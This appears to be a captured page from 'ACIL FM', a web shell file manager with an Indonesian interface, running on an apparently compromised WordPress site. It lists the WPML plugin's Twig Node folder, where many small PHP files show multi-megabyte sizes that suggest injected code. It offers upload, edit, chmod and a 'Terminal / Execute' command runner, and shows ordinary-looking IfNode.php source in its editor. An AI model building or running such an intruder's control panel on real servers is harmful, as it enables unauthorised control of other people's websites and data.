ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site/wp-content/plugins/sitepress-multilingual-cms/lib/twig/src/Node
/
home
mhhtmff
www
site
wp-content
plugins
sitepress-multilingual-cms
lib
twig
src
Node
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Expression
-
chmod
Open
Rename
Delete
AutoEscapeNode.php
1009 B
chmod
View
DL
Edit
Rename
Delete
BlockNode.php
1023 B
chmod
View
DL
Edit
Rename
Delete
BlockReferenceNode.php
948 B
chmod
View
DL
Edit
Rename
Delete
BodyNode.php
453 B
chmod
View
DL
Edit
Rename
Delete
CheckSecurityNode.php
2.73 MB
chmod
View
DL
Edit
Rename
Delete
CheckToStringNode.php
1.17 MB
chmod
View
DL
Edit
Rename
Delete
DeprecatedNode.php
1.45 MB
chmod
View
DL
Edit
Rename
Delete
DoNode.php
895 B
chmod
View
DL
Edit
Rename
Delete
EmbedNode.php
1.55 MB
chmod
View
DL
Edit
Rename
Delete
FlushNode.php
734 B
chmod
View
DL
Edit
Rename
Delete
ForLoopNode.php
1.4 MB
chmod
View
DL
Edit
Rename
Delete
ForNode.php
3.96 MB
chmod
View
DL
Edit
Rename
Delete
IfNode.php
1.5 MB
chmod
View
DL
Edit
Rename
Delete
ImportNode.php
1.44 MB
chmod
View
DL
Edit
Rename
Delete
IncludeNode.php
2.8 MB
chmod
View
DL
Edit
Rename
Delete
MacroNode.php
3.23 MB
chmod
View
DL
Edit
Rename
Delete
ModuleNode.php
13.58 MB
chmod
View
DL
Edit
Rename
Delete
Node.php
7.56 MB
chmod
View
DL
Edit
Rename
Delete
NodeCaptureInterface.php
496 B
chmod
View
DL
Edit
Rename
Delete
NodeOutputInterface.php
473 B
chmod
View
DL
Edit
Rename
Delete
PrintNode.php
1007 B
chmod
View
DL
Edit
Rename
Delete
SandboxedPrintNode.php
1.85 MB
chmod
View
DL
Edit
Rename
Delete
SandboxNode.php
1.06 MB
chmod
View
DL
Edit
Rename
Delete
SetNode.php
3.39 MB
chmod
View
DL
Edit
Rename
Delete
SetTempNode.php
873 B
chmod
View
DL
Edit
Rename
Delete
SpacelessNode.php
1.14 MB
chmod
View
DL
Edit
Rename
Delete
TextNode.php
858 B
chmod
View
DL
Edit
Rename
Delete
WithNode.php
2.05 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site/wp-content/plugins/sitepress-multilingual-cms/lib/twig/src/Node/IfNode.php
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * (c) Armin Ronacher * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace WPML\Core\Twig\Node; use WPML\Core\Twig\Compiler; /** * Represents an if node. * * @author Fabien Potencier <fabien@symfony.com> */ class IfNode extends \WPML\Core\Twig\Node\Node { public function __construct(\WPML\Core\Twig_NodeInterface $tests, \WPML\Core\Twig_NodeInterface $else = null, $lineno, $tag = null) { $nodes = ['tests' => $tests]; if (null !== $else) { $nodes['else'] = $else; } parent::__construct($nodes, [], $lineno, $tag); } public function compile(\WPML\Core\Twig\Compiler $compiler) { $compiler->addDebugInfo($this); for ($i = 0, $count = \count($this->getNode('tests')); $i < $count; $i += 2) { if ($i > 0) { $compiler->outdent()->write('} elseif ('); } else { $compiler->write('if ('); } $compiler->subcompile($this->getNode('tests')->getNode($i))->raw(") {\n")->indent()->subcompile($this->getNode('tests')->getNode($i + 1)); } if ($this->hasNode('else')) { $compiler->outdent()->write("} else {\n")->indent()->subcompile($this->getNode('else')); } $compiler->outdent()->write("}\n"); } } \class_alias('WPML\\Core\\Twig\\Node\\IfNode', 'WPML\\Core\\Twig_Node_If');
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply